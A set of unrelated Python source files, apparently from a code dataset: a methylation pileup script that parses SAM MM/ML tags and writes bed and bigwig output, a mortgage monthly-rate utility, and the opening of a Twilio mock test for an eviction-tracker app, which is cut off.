if not cg_sites_ref_set:
cg_sites_ref_set.add(-1)
# once seq is found, stop iterating
break
# make sure the ref region was matched to a ref fasta seq
if not cg_sites_ref_set:
logging.error("cg_sites_from_fasta: The sequence '{}' was not found in the reference fasta file.".format(ref))
raise ValueError('The sequence "{}" was not found in the reference fasta file!'.format(ref))
return cg_sites_ref_set
def get_mod_sequence(integers):
"""
A generator that takes an iterable of integers coding mod bases from the SAM Mm tags, and yields an iterable of
positions of sequential bases.
Example: [5, 12, 0] -> [6, 19, 20]
In above example the 6th C, 19th C, and 20th C are modified
See this example described in: https://samtools.github.io/hts-specs/SAMtags.pdf; Dec 9 2021
:param integers: Iterable of integers (parsed from SAM Mm tag). (iter)
:return mod_sequence: Iterator of integers, 1-based counts of position of modified base in set of bases. (iter)
"""
base_count = 0
for i in integers:
base_count += i + 1
yield base_count
def get_base_indices(query_seq, base, reverse):
"""
Find all occurrences of base in query sequence and make a list of their
indices. Return the list of indices.
:param query_seq: The original read sequence (not aligned read sequence). (str)
:param base: The nucleotide modifications occur on ('C'). (str)
:param reverse: True/False whether sequence is reversed. (Boolean)
:return: List of integers, 0-based indices of all bases in query seq. (list)
"""
if reverse == False:
return [i.start() for i in re.finditer(base, query_seq)]
# if seq stored in reverse, need reverse complement to get correct indices for base
# use biopython for this (convert to Seq, get RC, convert to string)
else:
return [i.start() for i in re.finditer(base, str(Seq(query_seq).reverse_complement()))]
def parse_mmtag(query_seq, mmtag, modcode, base, reverse):
"""
Get a generator of the 0-based indices of the modified bases in the query sequence.
:param query_seq: The original read sequence (not aligned read sequence). (str)
:param mmtag: The Mm tag obtained for the read ('C+m,5,12,0;'). (str)
:param modcode: The modification code to search for in the tag ('C+m'). (str)
:param base: The nucleotide modifications occur on ('C'). (str)
:param reverse: True/False whether sequence is reversed. (Boolean)
:return mod_base_indices: Generator of integers, 0-based indices of all mod bases in query seq. (iter)
"""
try:
# tags are written as: C+m,5,12,0;C+h,5,12,0;
# if multiple mod types present in tag, must find relevant one first
modline = next(x[len(modcode)+1:] for x in mmtag.split(';') if x.startswith(modcode))
# first get the sequence of the mod bases from tag integers
# this is a 1-based position of each mod base in the complete set of this base from this read
# e.g., [6, 19, 20] = the 6th, 19th, and 20th C bases are modified in the set of Cs
mod_sequence = get_mod_sequence((int(x) for x in modline.split(',')))
# get all 0-based indices of this base in this read, e.g. every C position
base_indices = get_base_indices(query_seq, base, reverse)
# use the mod sequence to identify indices of the mod bases in the read
return (base_indices[i - 1] for i in mod_sequence)
except:
return iter(())
def parse_mltag(mltag):
"""
Convert 255 discrete integer code into mod score 0-1, return as a generator.
This is NOT designed to handle interleaved Ml format for multiple mod types!
:param mltag: The Ml tag obtained for the read with('Ml:B:C,204,89,26'). (str)
:return: Generator of floats, probabilities of all mod bases in query seq. (iter)
"""
return (round(x / 256, 3) if x > 0 else 0 for x in mltag)
def get_mod_dict(query_seq, mmtag, modcode, base, mltag, reverse):
"""
Make a dictionary from the Mm and Ml tags, in which the
modified base index (in the query seq) is the key and the
mod score is the value.
This is NOT designed to handle interleaved Ml format for multiple mod types!
:param query_seq: The original read sequence (not aligned read sequence). (str)
:param mmtag: The Mm tag obtained for the read ('C+m,5,12,0;'). (str)
:param modcode: The modification code to search for in the tag ('C+m'). (str)
:param base: The nucleotide modifications occur on ('C'). (str)
:param mltag: The Ml tag obtained for the read with('Ml:B:C,204,89,26'). (str)
:param reverse: True/False whether sequence is reversed. (Boolean)
:return mod_dict: Dictionary with mod positions and scores. (dict)
"""
mod_base_indices = parse_mmtag(query_seq, mmtag, modcode, base, reverse)
mod_scores = parse_mltag(mltag)
mod_dict = dict(zip(mod_base_indices, mod_scores))
return mod_dict
def pileup_from_reads(bamIn, ref, pos_start, pos_stop, min_mapq, hap_tag, modsites):
"""
For a given region, retrieve all reads.
For each read, iterate over positions aligned to this region.
Build a list with an entry for each ref position in the region. Each entry has a list of 3-tuples, each of which
includes information from a read base read aligned to that site. The 3-tuple contains strand information,
modification score, and haplotype.
(strand symbol (str), mod score (float), haplotype (int))
Return the unfiltered list of base modification data.
:param bamIn: AlignmentFile object of input bam file.
:param ref: Reference name. (str)
:param pos_start: Start coordinate for region. (int)
:param pos_stop: Stop coordinate for region. (int)
:param min_mapq: Minimum mapping quality score. (int)
:param hap_tag: Name of SAM tag containing haplotype information. (str)
:param modsites: Filtering method. (str: "denovo", "reference")
:return basemod_data: Unfiltered list of base modification data (list)
:return cg_sites_read_set: Set of positions in read consensus sequence with CG, given as reference position. The
set is empty unless modsites is 'denovo' (set)
"""
logging.debug("coordinates {}: {:,}-{:,}: (2) pileup_from_reads".format(ref, pos_start, pos_stop))
basemod_data = []
# These structures are only used for modsites denovo mode
pos_pileup = []
pos_pileup_hap1 = []
pos_pileup_hap2 = []
is_denovo_modsites = modsites == "denovo"
# iterate over all reads present in this region
for read in bamIn.fetch(contig=ref, start=pos_start, stop=pos_stop):
# check if passes minimum mapping quality score
if read.mapping_quality < min_mapq:
#logging.warning("pileup_from_reads: read did not pass minimum mapQV: {}".format(read.query_name))
continue
# identify the haplotype tag, if any (default tag = HP)
# values are 1 or 2 (for haplotypes), or 0 (no haplotype)
# an integer is expected but custom tags can produce strings instead
try:
hap_val = read.get_tag(hap_tag)
try:
hap = int(hap_val)
except ValueError:
logging.error("coordinates {}: {:,}-{:,}: (2) pileup_from_reads: illegal haplotype value {}".format(ref, pos_start, pos_stop, hap_val))
except KeyError:
hap = 0
# check for SAM-spec methylation tags
# draft tags were Ml and Mm, accepted tags are now ML and MM
# check for both types, set defaults to None and change if found
mmtag, mltag = None, None
try:
mmtag = read.get_tag('Mm')
mltag = read.get_tag('Ml')
except KeyError:
pass
try:
mmtag = read.get_tag('MM')
mltag = read.get_tag('ML')
except KeyError:
pass
if mmtag is not None and mltag is not None:
if not basemod_data:
ref_pos_count = 1 + pos_stop - pos_start
basemod_data = [[] for _ in range(ref_pos_count)]
if is_denovo_modsites:
pos_pileup = [[] for _ in range(ref_pos_count)]
pos_pileup_hap1 = [[] for _ in range(ref_pos_count)]
pos_pileup_hap2 = [[] for _ in range(ref_pos_count)]
is_reverse = bool(read.is_reverse)
strand = "+"
if is_reverse :
strand = "-"
rev_strand_offset = len(read.query_sequence) - 2
# note that this could potentially be used for other mod types, but
# the Mm and Ml parsing functions are not set up for the interleaved format
# e.g., ‘Mm:Z:C+mh,5,12; Ml:B:C,204,26,89,130’ does NOT work
# to work it must be one mod type, and one score per mod position
mod_dict = get_mod_dict(read.query_sequence, mmtag, 'C+m', 'C', mltag, is_reverse)
if True:
# iterate over positions
for query_pos, ref_pos in read.get_aligned_pairs(matches_only=True)[20:-20]:
# make sure ref position is in range of ref target region
if ref_pos >= pos_start and ref_pos <= pos_stop:
ref_offset = ref_pos - pos_start
# building a consensus is MUCH faster when we iterate over reads (vs. by column then by read)
# we are building a dictionary with ref position as key and list of bases as val
if is_denovo_modsites:
query_base = read.query_sequence[query_pos]
pos_pileup[ref_offset].append(query_base)
if hap == 1:
pos_pileup_hap1[ref_offset].append(query_base)
elif hap == 2:
pos_pileup_hap2[ref_offset].append(query_base)
# identify if read is reverse strand or forward to set correct location
if is_reverse:
location = (rev_strand_offset - query_pos)
else:
location = query_pos
# check if this position has a mod score in the dictionary,
# if not assign score of zero
score = mod_dict.get(location, 0)
# Add tuple with strand, modification score, and haplotype to the list for this position
basemod_data[ref_offset].append((strand, score, hap))
# if no SAM-spec methylation tags present, ignore read and log
else:
logging.warning("pileup_from_reads: read missing MM and/or ML tag(s): {}".format(read.query_name))
cg_sites_read_set = set()
if is_denovo_modsites:
for refpos_list in (pos_pileup, pos_pileup_hap1, pos_pileup_hap2):
last_base = 'N'
last_index = 0
for index,v in enumerate(refpos_list):
# find the most common base, if no reads present use N
if len(v):
base = Counter(v).most_common(1)[0][0]
else:
base = 'N'
if last_base == 'C' and base == 'G' :
cg_sites_read_set.add(pos_start+last_index)
# This restriction recreates the original code behavior:
# - Advantage: Method can find a CpG aligning across a deletion in the reference
# - Disadvantage: Method will find 'fake' CpG across gaps in the haplotype phasing
#
# The disadvantage is fixable, but first focus on identical output to make verification easy
if base != 'N':
last_base = base
last_index = index
return basemod_data, cg_sites_read_set
def filter_basemod_data(basemod_data, cg_sites_read_set, ref, pos_start, pos_stop, input_fasta, modsites):
"""
Filter the per-position base modification data, based on the modsites option selected:
"reference": Keep all sites that match a reference CG site (this includes both
modified and unmodified sites). It will exclude all modified sites
that are not CG sites, according to the ref sequence.
"denovo": Keep all sites which have at least one modification score > 0, per strand.
This can include sites that are CG in the reads, but not in the reference.
It can exclude CG sites with no modifications on either strand from being
written to the bed file.
Return the filtered list.
:param basemod_data: List of base modification data per position, offset by pos_start. (list)
:param cg_sites_read_set: Set with reference coordinates for all CG sites in consensus from reads. (set)
:param ref: A path to reference fasta file. (str)
:param pos_start: Start coordinate for region. (int)
:param pos_stop: Stop coordinate for region. (int)
:param modsites: Filtering method. (str: "denovo", "reference")
:param ref: Reference name. (str)
:return filtered_basemod_data: List of 2-tuples for each position retained after filtering. Each 2-tuple is the
reference position and base mod data list. The list is sorted by reference position (list)
"""
filtered_basemod_data = []
if modsites == "reference":
if basemod_data:
# Get CG positions in reference
cg_sites_ref_set = cg_sites_from_fasta(input_fasta, ref)
# Keep all sites that match a reference CG position and have at least one basemod observation.
filtered_basemod_data=[(i+pos_start,v) for i, v in enumerate(basemod_data) if (i + pos_start) in cg_sites_ref_set and v]
logging.debug("coordinates {}: {:,}-{:,}: (3) filter_basemod_data: sites kept = {:,}".format(ref, pos_start, pos_stop, len(filtered_basemod_data)))
elif modsites == "denovo":
if basemod_data:
# Keep all sites that match position of a read consensus CG site.
filtered_basemod_data=[(i+pos_start,v) for i, v in enumerate(basemod_data) if (i + pos_start) in cg_sites_read_set]
logging.debug("coordinates {}: {:,}-{:,}: (3) filter_basemod_data: sites kept = {:,}".format(ref, pos_start, pos_stop, len(filtered_basemod_data)))
del basemod_data
del cg_sites_read_set
return filtered_basemod_data
def calc_stats(df):
"""
Gets summary stats from a given dataframe p.
:param df: Pandas dataframe.
:return: Summary statistics
"""
total = df.shape[0]
mod = df[df['prob'] > 0.5].shape[0]
unMod = df[df['prob'] <= 0.5].shape[0]
modScore = "." if mod == 0 else str(round(df[df['prob'] > 0.5]['prob'].mean(), 3))
unModScore = "." if unMod == 0 else str(round(df[df['prob'] <= 0.5]['prob'].mean(), 3))
percentMod = 0.0 if mod == 0 else round((mod / total) * 100, 1)
return percentMod, mod, unMod, modScore, unModScore
def collect_bed_results_count(ref, pos_start, pos_stop, filtered_basemod_data):
"""
Iterates over reference positions and for each position, makes a pandas dataframe from the sublists.
The dataframe is filtered for strands and haplotypes, and summary statistics are
calculated with calc_stats().
For each position and strand/haploytpe combination, a sublist of summary information
is appended to the bed_results list:
[(0) ref name, (1) start coord, (2) stop coord, (3) mod probability, (4) haplotype, (5) coverage,
(6) mod sites, (7) unmod sites, (8) mod score, (9) unmod score]
This information is used to write the output bed file.
:param ref: Reference name. (str)
:param pos_start: Start coordinate for region. (int)
:param pos_stop: Stop coordinate for region. (int)
:param filtered_basemod_data: List of 2-tuples for each position remaining after filtration. Each 2-tuple is the
reference position and base mod dat. The list is sorted by reference position (list)
:return bed_results: List of sublists with information to write the output bed file. (list)
"""
logging.debug("coordinates {}: {:,}-{:,}: (4) collect_bed_results_count".format(ref, pos_start, pos_stop))
# intiate empty list to store bed sublists
bed_results = []
# iterate over the ref positions and corresponding vals
for (refPosition, modinfoList) in filtered_basemod_data:
# create pandas dataframe from this list of sublists
df = pd.DataFrame(modinfoList, columns=['strand', 'prob', 'hap'])
# Filter dataframe based on strand/haplotype combinations, get information,
# and create sublists and append to bed_results.
# merged strands / haplotype 1
percentMod, mod, unMod, modScore, unModScore = calc_stats(df[df['hap'] == 1])
if mod + unMod >= 1:
bed_results.append([ref, refPosition, (refPosition + 1), percentMod,
"hap1", mod + unMod, mod, unMod, modScore, unModScore])
# merged strands / haplotype 2
percentMod, mod, unMod, modScore, unModScore = calc_stats(df[df['hap'] == 2])
if mod + unMod >= 1:
bed_results.append([ref, refPosition, (refPosition + 1), percentMod,
"hap2", mod + unMod, mod, unMod, modScore, unModScore])
# merged strands / both haplotypes
percentMod, mod, unMod, modScore, unModScore = calc_stats(df)
if mod + unMod >= 1:
bed_results.append([ref, refPosition, (refPosition + 1), percentMod,
"Total", mod + unMod, mod, unMod, modScore, unModScore])
return bed_results
def get_normalized_histo(probs, adj):
"""
Create the array data structure needed to apply the model, for a given site.
:param probs: List of methylation probabilities. (list)
:param adj: A 0 or 1 indicating whether previous position was a CG. (int)
:return: List with normalized histogram and coverage (if min coverage met), else returns empty list. (list)
"""
cov = len(probs)
if (cov >= 4):
hist = np.histogram(probs, bins=20, range=[0, 1])[0]
norm = np.linalg.norm(hist)
# divide hist by norm and add values to array
# add either 0 (not adjacent to a prior CG) or 1 (adjacent to a prior CG) to final spot in array
norm_hist = np.append(hist / norm, adj)
return [norm_hist, cov]
else:
return []
def discretize_score(score, coverage):
"""
Apply a small correction to the model probability to make it
compatible with the number of reads at that site. Allows the number
of modified and unmodified reads to be estimated.
:param score: Modification probability, from model. (float)
:param coverage: Number of reads. (int)
:return mod_reads: Estimated number of modified reads. (int)
:return unmod_reads: Estimated number of unmodified reads. (int)
:return adjusted_score: Adjusted probability score, based on percent modified reads. (float)
"""
# need to round up or round down modified read numbers based on score
# which allows a push towards 0/50/100 for adjusted score
if score > 50:
if score < 65:
mod_reads = int(np.floor(score/100 * float(coverage)))
else:
mod_reads = int(np.ceil(score/100 * float(coverage)))
else:
if score > 35:
mod_reads = int(np.ceil(score/100 * float(coverage)))
else:
mod_reads = int(np.floor(score/100 * float(coverage)))
unmod_reads = int(coverage) - mod_reads
if mod_reads == 0:
adjusted_score = 0.0
else:
adjusted_score = round((mod_reads / (mod_reads + unmod_reads)) * 100, 1)
return mod_reads, unmod_reads, adjusted_score
def apply_model(refpositions, normhistos, coverages, ref, pos_start, pos_stop, model, hap, bed_results):
"""
Apply model to make modification calls for all sites using a sliding window approach.
Append to a list of results, ultimately for bed file:
[(0) ref name, (1) start coord, (2) stop coord, (3) mod probability, (4) haplotype, (5) coverage,
(6) mod sites, (7) unmod sites, (8) adjusted probability]
:param refpositions: List with all CG positions. (list)
:param normhistos: List with all normalized histogram data structures. (list)
:param coverages: List with all CG coverages. (list)
:param ref: Reference contig name. (str)
:param pos_start: Start coordinate for region. (int)
:param pos_stop: Stop coordinate for region. (int)
:param model: The tensorflow model object.
:param hap: Label of haplotype (hap1, hap2, or Total). (str)
:param bed_results: List of bed results to which these model results will be appended (list)
"""
if len(normhistos) > 11:
featPad = np.pad(np.stack(normhistos), pad_width=((6, 4), (0, 0)), mode='constant', constant_values=0)
featuresWindow = sliding_window_view(featPad, 11, axis=0)
featuresWindow = np.swapaxes(featuresWindow, 1, 2)
predict = model.predict(featuresWindow)
predict = np.clip(predict, 0, 1)
for i, position in enumerate(refpositions):
model_score = round(predict[i][0] * 100, 1)
mod_reads, unmod_reads, adjusted_score = discretize_score(model_score, coverages[i])
bed_results.append((ref, position, (position + 1), model_score, hap, coverages[i], mod_reads, unmod_reads, adjusted_score))
else:
logging.warning("coordinates {}: {:,}-{:,}: apply_model: insufficient data for {}".format(ref, pos_start, pos_stop, hap))
def collect_bed_results_model(ref, pos_start, pos_stop, filtered_basemod_data, model_dir):
"""
Iterates over reference positions and creates normalized histograms of scores,
feeds all sites and scores into model function to assign modification probabilities,
and creates a list of sublists for writing bed files:
[(0) ref name, (1) start coord, (2) stop coord, (3) mod probability, (4) haplotype, (5) coverage,
(6) mod sites, (7) unmod sites, (8) adjusted probability]
This information is returned and ultimately used to write the output bed file.
:param ref: Reference name. (str)
:param pos_start: Start coordinate for region. (int)
:param pos_stop: Stop coordinate for region. (int)
:param filtered_basemod_data: List of 2-tuples for each position remaining after filtration. Each 2-tuple is the
reference position and base mod dat. The list is sorted by reference position (list)
:param model_dir: Full path to directory containing model. (str)
:return bed_results: List of sublists with information to write the output bed file. (list)
"""
logging.debug("coordinates {}: {:,}-{:,}: (4) collect_bed_results_model".format(ref, pos_start, pos_stop))
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import tensorflow as tf
logging.getLogger('tensorflow').setLevel(logging.ERROR)
# this may or may not do anything to help with the greedy thread situation...
#tf.config.threading.set_intra_op_parallelism_threads(1)
#tf.config.threading.set_inter_op_parallelism_threads(1)
model = tf.keras.models.load_model(model_dir, compile=False)
total_refpositions, total_normhistos, total_coverages = [], [], []
hap1_refpositions, hap1_normhistos, hap1_coverages = [], [], []
hap2_refpositions, hap2_normhistos, hap2_coverages = [], [], []
# set initial C index for CG location to 0
previousLocation = 0
# iterate over reference positions and values (list containing [strand, score, hap]) in filtered_basemod_data
for (refPosition, modinfoList) in filtered_basemod_data:
# determine if there is an adjacent prior CG, score appropriately
if (refPosition - previousLocation) == 2:
adj = 1
else:
adj = 0
# update CG position
previousLocation = refPosition
# build lists for combined haplotypes
# returns [norm_hist, cov] if min coverage met, otherwise returns empty list
total_result_list = get_normalized_histo([x[1] for x in modinfoList], adj)
if total_result_list:
total_normhistos.append(total_result_list[0])
total_coverages.append(total_result_list[1])
total_refpositions.append(refPosition)
# build lists for hap1
hap1_result_list = get_normalized_histo([x[1] for x in modinfoList if x[2] == 1], adj)
if hap1_result_list:
hap1_normhistos.append(hap1_result_list[0])
hap1_coverages.append(hap1_result_list[1])
hap1_refpositions.append(refPosition)
# build lists for hap2
hap2_result_list = get_normalized_histo([x[1] for x in modinfoList if x[2] == 2], adj)
if hap2_result_list:
hap2_normhistos.append(hap2_result_list[0])
hap2_coverages.append(hap2_result_list[1])
hap2_refpositions.append(refPosition)
# initiate empty list to store all bed results
bed_results = []
# run model for total, hap1, hap2, and add to bed results if non-empty list was returned
apply_model(total_refpositions, total_normhistos, total_coverages, ref, pos_start, pos_stop, model, "Total", bed_results)
apply_model(hap1_refpositions, hap1_normhistos, hap1_coverages, ref, pos_start, pos_stop, model, "hap1", bed_results)
apply_model(hap2_refpositions, hap2_normhistos, hap2_coverages, ref, pos_start, pos_stop, model, "hap2", bed_results)
return bed_results
def run_process_region(arguments):
"""
Process a given reference region to identify modified bases.
Uses pickled args (input_file, ref, pos_start, pos_stop) to run
pileup_from_reads() to get all desired sites (based on modsites option),
then runs collect_bed_results() to summarize information.
The sublists will differ between model or count method, but they always share the first 7 elements:
[(0) ref name, (1) start coord, (2) stop coord, (3) mod probability, (4) haplotype, (5) coverage, ...]
:param arguments: Pickled list. (list)
:return bed_results: List of sublists with information to write the output bed file. (list)
"""
# unpack pickled items:
# [bam path (str), fasta path (str), modsites option (str),
# pileup_mode option (str), model directory path (str),
# reference contig name (str), start coordinate (int),
# stop coordinate (int), minimum mapping QV (int), haplotype tag name (str)]
input_bam, input_fasta, modsites, pileup_mode, model_dir, ref, pos_start, pos_stop, min_mapq, hap_tag = arguments
logging.debug("coordinates {}: {:,}-{:,}: (1) run_process_region: start".format(ref, pos_start, pos_stop))
# open the input bam file with pysam
bamIn = pysam.AlignmentFile(input_bam, 'rb')
# get all ref sites with mods and information from corresponding aligned reads
basemod_data, cg_sites_read_set = pileup_from_reads(bamIn, ref, pos_start, pos_stop, min_mapq, hap_tag, modsites)
# filter based on denovo or reference sites
filtered_basemod_data = filter_basemod_data(basemod_data, cg_sites_read_set, ref, pos_start, pos_stop, input_fasta, modsites)
# bam object no longer needed, close file
bamIn.close()
if filtered_basemod_data:
# summarize the mod results, depends on pileup_mode option selected
if pileup_mode == "count":
bed_results = collect_bed_results_count(ref, pos_start, pos_stop, filtered_basemod_data)
elif pileup_mode == "model":
bed_results = collect_bed_results_model(ref, pos_start, pos_stop, filtered_basemod_data, model_dir)
else:
bed_results = []
logging.debug("coordinates {}: {:,}-{:,}: (5) run_process_region: finish".format(ref, pos_start, pos_stop))
if len(bed_results) > 1:
return bed_results
else:
return
def run_process_region_wrapper(arguments):
try:
return run_process_region(arguments)
except Exception as e:
sys.stderr.write("Exception thrown in worker process {}: {}\n".format(os.getpid(),e))
raise
def run_all_pileup_processing(regions_to_process, threads):
"""
Function to distribute jobs based on reference regions created.
Collects results and returns list for writing output bed file.
The bed results will differ based on model or count method, but they always share the first 7 elements:
[(0) ref name, (1) start coord, (2) stop coord, (3) mod probability, (4) haplotype, (5) coverage, ...]
:param regions_to_process: List of sublists defining regions (input_file, ref, pos_start, pos_stop). (list)
:param threads: Number of threads to use for multiprocessing. (int)
:return filtered_bed_results: List of sublists with information to write the output bed file. (list)
"""
logging.info("run_all_pileup_processing: Starting parallel processing.\n")
# run all jobs
progress_bar = None
if sys.stderr.isatty():
progress_bar = tqdm(total=len(regions_to_process), miniters=1, smoothing=0)
bed_results = []
with concurrent.futures.ProcessPoolExecutor(max_workers=threads) as executor:
futures = [executor.submit(run_process_region_wrapper, r) for r in regions_to_process]
# Process results in order of completion
for future in concurrent.futures.as_completed(futures):
bed_result = future.result()
bed_results.append(bed_result)
if progress_bar:
progress_bar.update(1)
if progress_bar:
progress_bar.close()
logging.info("run_all_pileup_processing: Finished parallel processing.\n")
# results is a list of sublists, may contain None, remove these
filtered_bed_results = [i for i in bed_results if i]
# turn list of lists of sublists into list of sublists
flattened_bed_results = [i for sublist in filtered_bed_results for i in sublist]
# ensure bed results are sorted by ref contig name, start position
logging.info("run_all_pileup_processing: Starting sort for bed results.\n")
if flattened_bed_results:
flattened_bed_results.sort(key=itemgetter(0, 1))
logging.info("run_all_pileup_processing: Finished sort for bed results.\n")
return flattened_bed_results
def write_output_bed(label, modsites, min_coverage, bed_results):
"""
Writes output bed file(s) based on information in bed_merge_results (default).
Separates results into total, hap1, and hap2. If haplotypes not available,
only total is produced.
The bed_merge_results list will contain slighty different information depending on the pileup_mode option,
but the first 7 fields will be identical:
count-based list
[(0) ref name, (1) start coord, (2) stop coord, (3) mod probability, (4) haplotype, (5) coverage,
(6) mod sites, (7) unmod sites, (8) mod score, (9) unmod score]
OR
model-based list
[(0) ref name, (1) start coord, (2) stop coord, (3) mod probability, (4) haplotype, (5) coverage,
(6) mod sites, (7) unmod sites, (8) adjusted probability]
:param outname: Name of output bed file to write. (str)
:param modsites: "reference" or "denovo", for the CpG detection mode. (str)
:param min_coverage: Minimum coverage to retain a site. (int)
:param bed_results: List of sublists with information to write the output bed file. (list)
:return output_files: List of output bed file names that were successfully written. (list)
"""
logging.info("write_output_bed: Writing unfiltered output bed files.\n")
out_total = "{}.combined.{}.bed".format(label, modsites)
out_hap1 = "{}.hap1.{}.bed".format(label, modsites)
out_hap2 = "{}.hap2.{}.bed".format(label, modsites)
cov_total = "{}.combined.{}.mincov{}.bed".format(label, modsites, min_coverage)
cov_hap1 = "{}.hap1.{}.mincov{}.bed".format(label, modsites, min_coverage)
cov_hap2 = "{}.hap2.{}.mincov{}.bed".format(label, modsites, min_coverage)
# remove any previous version of output files
for f in [out_total, out_hap1, out_hap2, cov_total, cov_hap1, cov_hap2]:
if os.path.exists(f):
os.remove(f)
with open(out_total, 'a') as fh_total:
with open(out_hap1, 'a') as fh_hap1:
with open(out_hap2, 'a') as fh_hap2:
for i in bed_results:
if i[4] == "Total":
fh_total.write("{}\n".format("\t".join([str(j) for j in i])))
elif i[4] == "hap1":
fh_hap1.write("{}\n".format("\t".join([str(j) for j in i])))
elif i[4] == "hap2":
fh_hap2.write("{}\n".format("\t".join([str(j) for j in i])))
# write coverage-filtered versions of bed files
logging.info("write_output_bed: Writing coverage-filtered output bed files, using min coverage = {}.\n".format(min_coverage))
output_files = []
for inBed, covBed in [(out_total, cov_total), (out_hap1, cov_hap1), (out_hap2, cov_hap2)]:
# if haplotypes not present, the bed files are empty, remove and do not write cov-filtered version
if os.stat(inBed).st_size == 0:
os.remove(inBed)
else:
output_files.append(inBed)
# write coverage filtered bed file
with open(inBed, 'r') as fh_in, open(covBed, 'a') as fh_out:
for line in fh_in:
if int(line.split('\t')[5]) >= min_coverage:
fh_out.write(line)
# check to ensure some sites were written, otherwise remove
if os.stat(covBed).st_size == 0:
os.remove(covBed)
else:
output_files.append(covBed)
return output_files
def make_bed_df(bed, pileup_mode):
"""
Construct a pandas dataframe from a bed file.
count-based list
[(0) ref name, (1) start coord, (2) stop coord, (3) % mod sites, (4) haplotype, (5) coverage,
(6) mod sites, (7) unmod sites, (8) mod score, (9) unmod score]
OR
model-based list
[(0) ref name, (1) start coord, (2) stop coord, (3) mod probability, (4) haplotype, (5) coverage,
(6) mod sites, (7) unmod sites, (8) adjusted probability]
:param bed: Name of bed file.
:param pileup_mode: Site modification calling method. (str: "model", "count")
:return df: Pandas dataframe.
"""
logging.debug("make_bed_df: Converting '{}' to pandas dataframe.\n".format(bed))
if pileup_mode == "count":
df = pd.read_csv(bed, sep='\t', header=None,
names = ['chromosome', 'start', 'stop', 'mod_probability', 'haplotype', 'coverage',
'modified_bases', 'unmodified_bases', 'mod_score', 'unmod_score'])
df.drop(columns=['modified_bases', 'unmodified_bases', 'mod_score', 'unmod_score', 'haplotype', 'coverage'], inplace=True)
elif pileup_mode == "model":
df = pd.read_csv(bed, sep='\t', header=None,
names = ['chromosome', 'start', 'stop', 'mod_probability', 'haplotype', 'coverage',
'modified_bases', 'unmodified_bases', 'adj_prob'])
df.drop(columns=['haplotype', 'coverage', 'modified_bases', 'unmodified_bases', 'adj_prob'], inplace=True)
#df.sort_values(by=['chromosome', 'start'], inplace=True)
return df
def get_bigwig_header_info(input_fasta):
"""
Get chromosome names and lengths from reference fasta.
:param input_fasta: Name of reference fasta file.
:return header: List of tuples, containing [ (ref1, length1), (ref2, length2), ...] .
"""
logging.debug("get_bigwig_header_info: Getting ref:length info from reference fasta.\n")
header = []
with open(input_fasta) as fh:
for record in SeqIO.parse(fh, "fasta"):
header.append((record.id, len(record.seq)))
return header
def write_bigwig_from_df(df, header, outname):
"""
Function to write a bigwig file using a pandas dataframe from a bed file.
:param df: Pandas dataframe object (created from bed file).
:param header: List containing (ref name, length) information. (list of tuples)
:param outname: Name of bigwig output file to write (OUT.bw).
"""
logging.debug("write_bigwig_from_df: Writing bigwig file for '{}'.\n".format(outname))
# first filter reference contigs to match those in bed file
# get all unique ref contig names from bed
chroms_present = list(df["chromosome"].unique())
# header is a list of tuples, filter to keep only those present in bed
# must also sort reference contigs by name
filtered_header = sorted([x for x in header if x[0] in chroms_present], key=itemgetter(0))
for i,j in filtered_header:
logging.debug("\tHeader includes: '{}', '{}'.".format(i,j))
# raise error if no reference contig names match
if not filtered_header:
logging.error("No reference contig names match between bed file and reference fasta!")
raise ValueError("No reference contig names match between bed file and reference fasta!")
# open bigwig object, enable writing mode (default is read only)
bw = pyBigWig.open(outname, "w")
# must add header to bigwig prior to writing entries
bw.addHeader(filtered_header)
# iterate over ref contig names
for chrom, length in filtered_header:
logging.debug("\tAdding entries for '{}'.".format(chrom))
# subset dataframe by chromosome name
temp_df = df[df["chromosome"] == chrom]
logging.debug("\tNumber of entries = {:,}.".format(temp_df.shape[0]))
# add entries in order specified for bigwig objects:
# list of chr names: ["chr1", "chr1", "chr1"]
# list of start coords: [1, 100, 125]
# list of stop coords: ends=[6, 120, 126]
# list of vals: values=[0.0, 1.0, 200.0]
bw.addEntries(list(temp_df["chromosome"]),
list(temp_df["start"]),
ends=list(temp_df["stop"]),
values=list(temp_df["mod_probability"]))
logging.debug("\tFinished entries for '{}'.\n".format(chrom))
# close bigwig object
bw.close()
def convert_bed_to_bigwig(bed_files, fasta, pileup_mode):
"""
Write bigwig files for each output bed file.
:param bed_files: List of output bed file names. (list)
:param fasta: A path to reference fasta file. (str)
:param pileup_mode: Site modification calling method. (str: "model", "count")
"""
logging.info("convert_bed_to_bigwig: Converting {} bed files to bigwig files.\n".format(len(bed_files)))
header = get_bigwig_header_info(fasta)
for bed in bed_files:
outname = "{}.bw".format(bed.split(".bed")[0])
df = make_bed_df(bed, pileup_mode)
write_bigwig_from_df(df, header, outname)
def main():
args = get_args()
setup_logging(args.output_label)
log_args(args)
if args.pileup_mode == "model":
if args.model_dir == None:
logging.error("Must supply a model to use when running model-based scoring!")
raise ValueError("Must supply a model to use when running model-based scoring!")
else:
if not os.path.isdir(args.model_dir):
logging.error("{} is not a valid directory path!".format(args.model_dir))
raise ValueError("{} is not a valid directory path!".format(args.model_dir))
print("\nChunking regions for multiprocessing.")
regions_to_process = get_regions_to_process(args.bam, args.fasta, args.chunksize, args.modsites,
args.pileup_mode, args.model_dir, args.min_mapq, args.hap_tag)
print("Running multiprocessing on {:,} chunks.".format(len(regions_to_process)))
bed_results = run_all_pileup_processing(regions_to_process, args.threads)
print("Finished multiprocessing.\nWriting bed files.")
bed_files = write_output_bed(args.output_label, args.modsites, args.min_coverage, bed_results)
print("Writing bigwig files.")
convert_bed_to_bigwig(bed_files, args.fasta, args.pileup_mode)
print("Finished.\n")
if __name__ == '__main__':
main()
| 2.203125 | 2 |
src/mortgage_scenarios/utils.py | mielski/mortgage_scenario | 1 | 12773175 | import numpy as np
def get_monthly_rate(rate) -> float:
"""
computes the monthy interest rate based on the yearly interest rate
:param float rate: the yearly interest rate
:return: the monthly interest rate
This computation uses the 12th root on the growth factor
"""
growth_year = rate + 1
growth_month = np.power(growth_year, 1./12)
rate_month = growth_month - 1
return rate_month
| 4.4375 | 4 |
tests/test_mock_twilio.py | gregziegan/eviction-tracker | 5 | 12773176 | <gh_stars>1-10
import unittest
import json
import os
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_testing import TestCase
from eviction_tracker.detainer_warrants.models import PhoneNumberVerification
from eviction_tracker.database import db
from eviction_tracker.app import create_app
from eviction_tracker.commands import validate_phone_number, twilio_client
class MockTwilioLookup:
def __init__(self, dictionary):
for k, v in dictionary.items():
